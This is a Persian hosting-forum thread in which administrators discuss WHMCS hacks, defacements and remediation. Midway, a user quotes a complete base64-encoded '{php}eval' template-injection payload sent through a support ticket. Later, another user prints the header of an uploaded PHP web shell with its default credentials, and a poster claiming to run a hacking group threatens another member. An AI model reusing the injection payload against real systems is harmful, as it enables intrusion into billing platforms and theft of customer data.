گرفتن حال اساسی هکر whmcs

سلام دوستان الان ساعت 50:20 دقیقه صبحه

داشتم سایت رو آپدیت میکردم . رو سی پنل بودم که یه دفعه متوجه جند تا فایل مشکوک شدم / اولین کاری که کردن خونسردیه خودمو حفظ کردم بعد سریعا اون 2 تا فایل شل رو پاک کردم و فولدر whmcs رو اصلا نگاه نکردم همشون ریختم تو زیپ ، فولدر بازشو هم سریع پاک کردم . سریع رفتم دیدم تو لایو زیلا هم شل ریخته . اون فولدر رو همین کار کردم . برگشتم بیرون روت دیدم اون 3 تا فولدری که تو آموزش پچ امنیتی زده بود اونارو هم دسترسی پیدا کرده . ولی قبل از اینکه کاری کنه سریع جلوشو گرفتم یه اسکرین شات از هک کردنشون میزارم تا ببنید

حالا باز بگید whmcs باگش حل شده . از من میشنوید همین الان بگردید مشکلش رو پیدا کنید از من گفتن بود . شانسی که آوردم من یه دامین دیگه زدم و جدا از این سایته . تمام یوزرنیم و پسورد ها رو از طریق اون ادرس ، ایمیل میکردم تو سیستم whmcs فقط کار حسابداری انجام می دادم و بهتره به عصر قجر برگردیم و از فرم های واریز فیش بانکی استفاده کنیم بهتره تا یه جوجه هکر بیاد این کار هارو انجام بده

اسکرین شات رو پیوست کردم

کد دیفیس رو هم تو یه html براتون گذاشتم که ببنید چه طوری بوده

راستی یادم رفت بگم که من بچ امنیتی رو کامل و بدون نقص نصب کرده بودم . بچه ها حواستون جم باشه . که شب نیان سراغ سایت شما

با صحبت و مذاکره ای که با تیم امنیتی http://www.black-hg.org داشتم . گفتن که این هک کار ما نبوده و هیچ دخالتی ما در این هک نداشتیم . البته قابل ذکر هست که لینک سایت و لینک zone یه اسم این تیم ثبت شده بود . احتمالا یکی می خواسته اسم این گروه رو خراب کنه

مطمون باش باگ نداره. مشکل 100 درصد از جای دیگه ای بوده.

نقل قول:

---

نوشته اصلی توسط hamidjan

مطمون باش باگ نداره. مشکل 100 درصد از جای دیگه ای بوده.

---

مطمعا باش هست . من ریز ، ریز همه جاهاشو قبلا چک کرده بودم .

اونوقت توی پوشه لایو زیلا چه جوری شل ریخته؟ این همه whmcs دیگه. چرا اونا هک نشده؟؟

نقل قول:

---

نوشته اصلی توسط hamidjan

اونوقت توی پوشه لایو زیلا چه جوری شل ریخته؟ این همه whmcs دیگه. چرا اونا هک نشده؟؟

---

داداش من . فکر کرده بود من فردا صبح میام فقط whmcs رو عوض میکنم . که بتونه بعدا دوباره وارد میشه

از طریق whmcs وارد شده بود .

بعد اومده بود تو فولدر لایو زیلا اونجا هم جدا ریخته بود که بعدا هم بتونه بیاد . فکر نمی کرد که من زرنگ تر از اونم

تیم whmcs یک سال بیشتر میشه که توی آموزشهاش گفته سه تا فولدر حساس رو بیارید خارج روت سایت. اگه کاربرا همین یک مورد رو رعایت می کردن حتی باگ خطرناک دو هفته پیش هم موثر نبود و کسی کاری نمیتونست بکنه

نقل قول:

---

نوشته اصلی توسط hamidjan

تیم whmcs یک سال بیشتر میشه که توی آموزشهاش گفته سه تا فولدر حساس رو بیارید خارج روت سایت. اگه کاربرا همین یک مورد رو رعایت می کردن حتی باگ خطرناک دو هفته پیش هم موثر نبود و کسی کاری نمیتونست بکنه

---

من پچ رو نصب کرده بودم حتی اون روز که نصب کردم کل فایل هامو چک کردم که مشکل نداشته باشه . از اون روز بالای 10 تا کد base64 اومده بود هیچ کدوم تاثیر نداشتن . این یکی واسم خیلی جالب بود که از کجا اومده تو سی پنل ؟ :104:

باگ قبلی whmcs طوری بود که هکر حتما باید فایلی که در پوشه downloads ساخته شده رو اجراش میکرد. وقتی این پوشه خارج از روت باشه، نمیتونه اجراش کنه و خنثی میشه.

وقتی به خارج از روت هم دسترسی پیدا کرده به احتمال زیاد هک شما از ناحیه دیگه ای بوده

نقل قول:

---

نوشته اصلی توسط hamidjan

باگ قبلی whmcs طوری بود که هکر حتما باید فایلی که در پوشه downloads ساخته شده رو اجراش میکرد. وقتی این پوشه خارج از روت باشه، نمیتونه اجراش کنه و خنثی میشه.

وقتی به خارج از روت هم دسترسی پیدا کرده به احتمال زیاد هک شما از ناحیه دیگه ای بوده

---

من رو هاستم هیچ چیزی جز whmcs ندارم

لایوزیلا که دارید.
خود هاست هم هست.
سیستم خودتون هم هست.
سایتهایی که در کنار شما میزبانی شدن هم هست.
و..و..و..

نقل قول:

---

نوشته اصلی توسط hamidjan

لایوزیلا که دارید.
خود هاست هم هست.
سیستم خودتون هم هست.
سایتهایی که در کنار شما میزبانی شدن هم هست.
و..و..و..

---

نه من هاست به کسی نمیدادم

لایوزیلا رو هم مطمعا هستم باگ نداره و الی ال الان بیشتر سایتها هک میشدن . شرمنده من نمی تونم دیگه بمونم تو سایت چون دقیقا از ساعت 9 صبح دیروز تا الان که 6:12 دقیقه هست بیدارم . ببخشید دیگه . من یه خورده به استراحت نیاز دارم

نقل قول:

---

نوشته اصلی توسط vps-baran.ir

نه من هاست به کسی نمیدادم

لایوزیلا رو هم مطمعا هستم باگ نداره و الی ال الان بیشتر سایتها هک میشدن . شرمنده من نمی تونم دیگه بمونم تو سایت چون دقیقا از ساعت 9 صبح دیروز تا الان که 6:12 دقیقه هست بیدارم . ببخشید دیگه . من یه خورده به استراحت نیاز دارم

---

استراحت بده به خودت مهندس. صبحت بخیر. خوابهای طلایی ببینی...

ولی اینو بدون اگه اون سه فولدرو پشت روت ببری هرگز هک نمیشی

نقل قول:

---

نوشته اصلی توسط maryam1

ولی اینو بدون اگه اون سه فولدرو پشت روت ببری هرگز هک نمیشی

---

البته درستش اینه که بگیم "از اون طریق خطرناک هک نمیشه"

چون ممکنه از طرق دیگه بشه هکش کرد. ایشون هم مطمئنا از یه طریق دیگه ای غیر از اون باگ خطرناک هک شده.

از كجا مطمئنيد كه دسترسي جديدي ايجاد شده ؟
وقتي هكر يكبار روي سايت شما نفوذ كرد ، 1000 راه براي مخفي كردن شل داره.دليلي نداره خود شل روي سرور وجود داشته باشه ، كافيه هر كدوم از فايل هاي شما رو ويرايش كنه ، ممكنه راه نفوذ رو در ديتابيس قرار بده .
ممكنه دسترسي در 1 الي 2 خط كد اضافي در هر كدوم از فايل هاي شما باشه ، ونه لزوما فايل هاي php ، فايل هاي عكس و ... گزينه مناسبي براي ذخيره كردن راه دسترسي هستند.
بهترين راه اينه كه شما كل فايل هايي كه نسخه اصلشون وجود داره رو پاك و دوباره آپلود كنيد.مابقي فايل ها به دقت چك بشند.
بررسي بشه كه هيچ پسوند غير استانداردي اجازه اجرا داره
امكان آپلود فايل توسط كاربر، هميشه يك تهديد به وجود مي آد و در طول زمان باگ هاي متعددي شناسايي شده (يا سهل انگاري برنامه نويس ،‌يا سطح بالاتر.)
در صورت امكان بهتره امكان آپلود فايل رو كلا از يوزر روي سرور اصلي ميزباني سايت خودتون بگيريد و فايل هاي اتچ و ... مشتريان روي سرور ديگه اي آپلود بشند.
اگر whmcs هم اين امكان رو نداشته باشه كد نويسيش نه خيلي پيچيدست و نه غير معقول
با خود شل ها هم بايد اساسي تر برخورد كرد ، من از سرور شما خبر ندارم اما در بسياري از سرور هايي كه ديدم امنيت يعني بستن 4 تابع و روشن كردم safe mode !
براي امنيت سرور مقالات زيادي وجود داره ولي كافي نيست، يك مثل معروف هست كه ميگه امنيت رابطه ي مستقيمي با $ داره !
بعد از ايجاد اولين دسترسي موارد بسيار زيادي رو بايد بررسي كرد.

نقل قول:

---

نوشته اصلی توسط maryam1

ولی اینو بدون اگه اون سه فولدرو پشت روت ببری هرگز هک نمیشی

---

من تو نوشته های قبلم گفتم که من یعد از اینکه بچ کامل و درست رو انجام داده بودم . نزدیک به 10 بار base64 برای من اومده بود ولی کاری نتونسه بودن بکنن دیروز برام عجیب بود به غیر از whmcs فایل دیگه ای نداشتم که بخوان از اون طریق وارد بشن

---------- Post added at 10:41 AM ---------- Previous post was at 10:40 AM ----------

نقل قول:

---

نوشته اصلی توسط hamidjan

البته درستش اینه که بگیم "از اون طریق خطرناک هک نمیشه"

چون ممکنه از طرق دیگه بشه هکش کرد. ایشون هم مطمئنا از یه طریق دیگه ای غیر از اون باگ خطرناک هک شده.

---

منم هم دقیقا اینو میگم که از همون راه ولی روش دیگه وارد شده

قبلا یه بار هک شده بودی؟

نقل قول:

---

نوشته اصلی توسط Rezash

از كجا مطمئنيد كه دسترسي جديدي ايجاد شده ؟
وقتي هكر يكبار روي سايت شما نفوذ كرد ، 1000 راه براي مخفي كردن شل داره.دليلي نداره خود شل روي سرور وجود داشته باشه ، كافيه هر كدوم از فايل هاي شما رو ويرايش كنه ، ممكنه راه نفوذ رو در ديتابيس قرار بده .
ممكنه دسترسي در 1 الي 2 خط كد اضافي در هر كدوم از فايل هاي شما باشه ، ونه لزوما فايل هاي php ، فايل هاي عكس و ... گزينه مناسبي براي ذخيره كردن راه دسترسي هستند.
بهترين راه اينه كه شما كل فايل هايي كه نسخه اصلشون وجود داره رو پاك و دوباره آپلود كنيد.مابقي فايل ها به دقت چك بشند.
بررسي بشه كه هيچ پسوند غير استانداردي اجازه اجرا داره
امكان آپلود فايل توسط كاربر، هميشه يك تهديد به وجود مي آد و در طول زمان باگ هاي متعددي شناسايي شده (يا سهل انگاري برنامه نويس ،‌يا سطح بالاتر.)
در صورت امكان بهتره امكان آپلود فايل رو كلا از يوزر روي سرور اصلي ميزباني سايت خودتون بگيريد و فايل هاي اتچ و ... مشتريان روي سرور ديگه اي آپلود بشند.
اگر whmcs هم اين امكان رو نداشته باشه كد نويسيش نه خيلي پيچيدست و نه غير معقول
با خود شل ها هم بايد اساسي تر برخورد كرد ، من از سرور شما خبر ندارم اما در بسياري از سرور هايي كه ديدم امنيت يعني بستن 4 تابع و روشن كردم safe mode !
براي امنيت سرور مقالات زيادي وجود داره ولي كافي نيست، يك مثل معروف هست كه ميگه امنيت رابطه ي مستقيمي با $ داره !
بعد از ايجاد اولين دسترسي موارد بسيار زيادي رو بايد بررسي كرد.

---

تمام گفته هاتون درست ولی من با پشتیبان سرور صحبت کردم که هیچ فایل یا گزارش هک تو سرور های اونا نشده . البته نه این که نخوان نگن . چون من ایشون را کاملا میشناسم . دروغ نمیگن

---------- Post added at 10:44 AM ---------- Previous post was at 10:42 AM ----------

نقل قول:

---

نوشته اصلی توسط hamidjan

قبلا یه بار هک شده بودی؟

---

نه من هک نشده بودم . کلا من تو این 11 سال کارم 2 بار هک شدم که یه باز 5 سال پیش با phpnuke هک شدم . و یه بار دیگش هم دیشب

خب لاگها رو نگاه کن دیگه. چرا اینقد دنبال جواب میگردی؟

نقل قول:

---

نوشته اصلی توسط hamidjan

خب لاگها رو نگاه کن دیگه. چرا اینقد دنبال جواب میگردی؟

---

خوب همین کار رو الان شروع کردم انجام بدم . چون مطمعن هستم که از طریق whmcs وارد شده

سلام دوستان از دیروز 3 بار این تیکت رو برام فرستادن
میخواستن هکم کنن
اما به بن بست خوردن مثل اینکه

کد HTML:

---

<form method="post">
    <textarea name="TextArea1" style="width: 653px; height: 82px">: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php</textarea></form>


---

درست حدس زدم ؟

نقل قول:

---

نوشته اصلی توسط mehdi.gh

سلام دوستان از دیروز 3 بار این تیکت رو برام فرستادن
میخواستن هکم کنن
اما به بن بست خوردن مثل اینکه

کد HTML:

---

<form method="post">
    <textarea name="TextArea1" style="width: 653px; height: 82px">: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php</textarea></form>


---

درست حدس زدم ؟

---

واسه من تیکت نیومده . دیشب مستقیم وارد هاست شده بودن . فایل whmcs رو که دیشب تو زیپ گذاشته بودم رو الان دانلود کردم رو پی سی . فابل رو با ویروس کش اسکن کردم . ویروس کش کل زیپ رو پاک کرد احتمالا کل فایل ها مشکل پیدا کردن .

ورژن جدید رو نصب کنید
بعد هم اون سه تا پوشه رو ببرید تو قبل از روت بذارید
دیگه هیچ مشکلی نیس
خودتونم به خودتون از این تیکت ها بزنید
سوپرایز : دانلود whmcs v5.0.3 و قالب شمسی و راست چین دیفالت

من که هم پچ رو گذاشتم
هم دسترسی فایل supportticket رو صفر کردم
بازم کاری که maryam1 گفتن انجام میدم

پچ رو بیخیال ورژن جدیدو بچسب یه نکنه تو ورژن جدید فایل function.php داخل پوشه اصلی حذف شده و فقط داخل include هست
اونو باید حذف کنید
پچو بیخیال حتما ورژن جدیدو نصب کنید و ایل function.php رو از محل نصب whmcs حذف کنید
اون سه پوشه رو هم ببرید پشت روت
من در طول روز 15 تا برام ازین تیکت ها میاد منم دارم بانک اطلاعاتی آیپی جمع میکنم
کلا یه وسیله سرگرمی شده برام

نقل قول:

---

نوشته اصلی توسط maryam1

پچ رو بیخیال ورژن جدیدو بچسب یه نکنه تو ورژن جدید فایل function.php داخل پوشه اصلی حذف شده و فقط داخل include هست
اونو باید حذف کنید
پچو بیخیال حتما ورژن جدیدو نصب کنید و ایل function.php رو از محل نصب whmcs حذف کنید
اون سه پوشه رو هم ببرید پشت روت
من در طول روز 15 تا برام ازین تیکت ها میاد منم دارم بانک اطلاعاتی آیپی جمع میکنم
کلا یه وسیله سرگرمی شده برام

---

حالبش اینه که همشون با وی - پی - ان وارد می شن که شناسایی نشن

من رو یه هفته پیش عرب های ....... هک کرده بودن :-&

نمایش مشخصات: badnam_051 - انجمن تخصصی وب هاستینگ ایران

ادمین بلک هت گروپ در وبهاستینگ تالک . میتونید از نزدیک ارتباط برقرار کنید اما شواهد نشون میده که این دیفیس کار این تیم نبوده به 2 دلیل :
1. این دیفیس پیج رسمی این تیم نیست
2.اسامی کسانی که در عکس بودند عضو رسمی این تیم نیستند

بازم باهاشون صحبت کنید اگر از طرف این تیم باشه برای پچ کردن باگ امنیتی موجود در سایتتون بهتون کمک میکنن
اینقدر هم روی whmcs حساس نباشید

موفق باشید

نقل قول:

---

نوشته اصلی توسط mehdi.gh

من رو یه هفته پیش عرب های ....... هک کرده بودن :-&

---

بابا باز اون عرب کث یف بوده . ولی یه ایرانیه بیاد . بخواد با هم وطن خودش این کارو کنه خیلی زورش . میاد . حالا تو سایت خودشون زدن که ما از فقط سایت های خارجی رو هک می کنیم

آره والا
حالا بیاد هک کنه
من که دیگه بک آپ روزانه میگیرم :d

دوست عزیز
همون طور که جناب rezash فرمودن
1. اینجاست که بسته بودن برخی توابع کار ساز است
2. بعد از نفوذ هکر اگه کمی وارد باشه بک دور یا همین راه های نفوذ متعدد برای نوبت بعد باز میکنه روی هدف که به احتمال زیاد روی سایت شما این مورد اتفاق افتاده
برای اینکه خیالتون راحت باشه اول کل فایل های داخل پوشه public_html رو با فایلهای اولیه whmcs که نصب میکنید جایگزین کنید (بک اپ از دیتابیس و ... فراموش نشه که ...)
بعد پسورد ها رو عوض بکنید و ببینید یوزر های دیگه ای ایجاد نشده.
سپس مراحل امنیتی لازم برای سیستم رو انجام بدید

امکانش هست دیتا بیس رو هم آلوده کرده باشه؟

نقل قول:

---

نوشته اصلی توسط vps-baran.ir

امکانش هست دیتا بیس رو هم آلوده کرده باشه؟

---

دیتابیس آلوده یعنی این که توی سیستم whmcs یوزر ایجاد کرده باشه یا تنظیمات امنیتی سیستم رو تغییر داده باشه مثلا امکان اپلود فایل با فرمت خاص رو باز کرده باشه و.. (با whmcs کار نکرده ام)

سلام ،

ما هم از دیشب که سرور رو بررسی می کنیم متوجه شدیم هکر موفق شده چند تا فایل روی سرور ما آپلود کنه
دیشب فایل r57shell آپلود شده بود.
پاک کردم و تمام پسورد ها هم تغییر دادم. ویروس اسکن هم کردم خبری نبود.
امروز با آنتی ویروس اسکن انجام شد و متوجه شدم دو تا فایل به اسم های s2.php , sy.php داخل یکی از پوشه هامون آپلود و مخفی شده که آنتی ویروس پیداش کرد و پاکش کردم.

یکی از شل ها جهت ارسال اسپم بود (فکر کنم به تمام ایمیل های سرور)
دومی هم وقتی باز میکردی ، یک صفحه مشکی بود و یوزر و پسورد می خواست!
جالب اینجاست که وقتی که خودم می خواستم فایل ها رو آپلود کنم آنتی ویروس اجازه نداد.
یعنی هکر تونسته فایروال و آنتی ویروس رو دور بزنه.

روی سیستم لایوزیلا هست و whmcs
whmcs نسخه 4.5 همین چند روز پیش از سایت خودش با لایسنس دانلود و نصب کردم (یعنی تمام پچ ها رو داره)
لایوزیلا هم که نسخه 3.2 هست.
خوشبختانه ما فقط دیفیس شدیم و اطلاعات در امان هستند.
اما چطور این مشکل به وجود آمده ؟
لازم به ذکره ما روی این سرور فقط خودمون هستیم و به کس دیگه ای هاست ندادیم!
safe_mode روشن هست.
تا جایی هم که شده توابع رو مسدود کردیم.
مشکل از کجا می تونه باشه ؟

نکته : فایل هایی که هکر اپلود کرده بود خارج از پوشه whmcs بودند.

نکته : قبلاً خودم تست کردم ، با شل r57 تونستم روی سرورم فایل write کنم ، اما بعد از بستن چند تا تابع ، این امکان هم از این شل گرفته شد. الان مشکل کجاست ؟

بالای شل هایی که اپلود شده بود اینا رو نوشته بودن :

کد:

---


<?php # syrian shell is a php evil script , please use it against Israel Only . #  ,--^----------,--------,-----,-------^--, #  | |||||||||  `--------'    |          O    .. SyRiAn Sh3ll V1 ....  sy34[at]msn[dot]com #  `+---------------------------^----------| #    `\_,-------, __EH << SyRiAn | 34G13__| #      / XXXXXX /`|    / #    / XXXXXX /  `\  / #    / XXXXXX /\______( #  / XXXXXX / #  / XXXXXX / # (________( #  `------ # # SyRiAn Sh3ll V1 . # Copyright (C) 2010 - SyRiAn 34G13 # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # I WISH THAT YOU WILL USE IT AGAINST ISRAEL ONLY !!! .  # next version ( upload files , chmod force , read files , no security , bypass , cgi , server shourtcut , eval , forbidden) $uselogin = 1;  // Make It 0 If you Want To Disable Auth $user = 'root';  // Username $pass = 'toor';  // Password #---------------------------------------------------------------# #                                        Powered By SyRiAn Shell                    # #                                          By EH SyRiAn 34G13                        # #                                        wWw.syrian-shell.com                      # #                                              Version 1                            # #                                            Made In SyRiA                          # #                                              20\10\2010                            # #---------------------------------------------------------------#

---

نقل قول:

---

نوشته اصلی توسط Mohammad_reza

whmcs نسخه 4.5 همین چند روز پیش از سایت خودش با لایسنس دانلود و نصب کردم (یعنی تمام پچ ها رو داره)

---

whmcs که آپدیت نکردی
الان نسخه 5.0.3 اومده

خوب فرقی نمی کنه چه 4.5 باشه و چه 5.0.3 :74:

---------- Post added at 04:17 PM ---------- Previous post was at 04:12 PM ----------

نقل قول:

---

نوشته اصلی توسط Mohammad_reza

خوشبختانه ما فقط دیفیس شدیم و اطلاعات در امان هستند.
اما چطور این مشکل به وجود آمده ؟
لازم به ذکره ما روی این سرور فقط خودمون هستیم و به کس دیگه ای هاست ندادیم!
safe_mode روشن هست.

نکته : فایل هایی که هکر اپلود کرده بود خارج از پوشه whmcs بودند.

[/CODE]

---

دقیقا هم همین اتفاق برای من افتاده امکان داره از صفحه ی دیفیس یه اسکرین شات بدی . من تو صفحه اصلی گذاشته بودن

نقل قول:

---

نوشته اصلی توسط majid67

whmcs که آپدیت نکردی
الان نسخه 5.0.3 اومده

---

در سایت whmcs نوشته تمام پچ ها در همه نسخه ها اعمال شد است...
مشکل خاصی شما پیدا کردید ؟

نقل قول:

---

نوشته اصلی توسط vps-baran.ir

خوب فرقی نمی کنه چه 4.5 باشه و چه 5.0.3 :74:

---

نسخه 4.5 تمام پچ ها رو نداره!!
باید پچ رو جدا دانلود و نصب کرد

نقل قول:

---

whmcs نسخه 4.5 همین چند روز پیش از سایت خودش با لایسنس دانلود و نصب کردم (یعنی تمام پچ ها رو داره)

---

---------- Post added at 04:22 PM ---------- Previous post was at 04:20 PM ----------

دانلود و نصب کن (1 دقیقه هم طول نمیکشه)
WHMCS - Security Patch

بنده ادمین black-hg.org هستم میشه بپرسم اقای vps-baran.ir به چه دلیل اسم سایت مارو اینجا مطرح کردی؟!
اولا شما در حدی نیستی که بخواییم هکت کنیم.
دوما تیم ما سایت ایرانی هک نمیکنه.
سوما اون اشخاصی که تو پیج دیفس هستن میشه بپرسم چه ربطی به تیم ما داره؟
این رو بدونید با این کارتون فقط واسه خودتون دشمن درست کردید و منتظر باشد سزای عملتون رو ببینید.

اگر دقت کنید پایین همین ، اینو نوشته :

کد:

---

* All client area downloads have been updated to include this by default

---

من whmcs رو بعد از انتشار این پچ دانلود و نصب کردم ...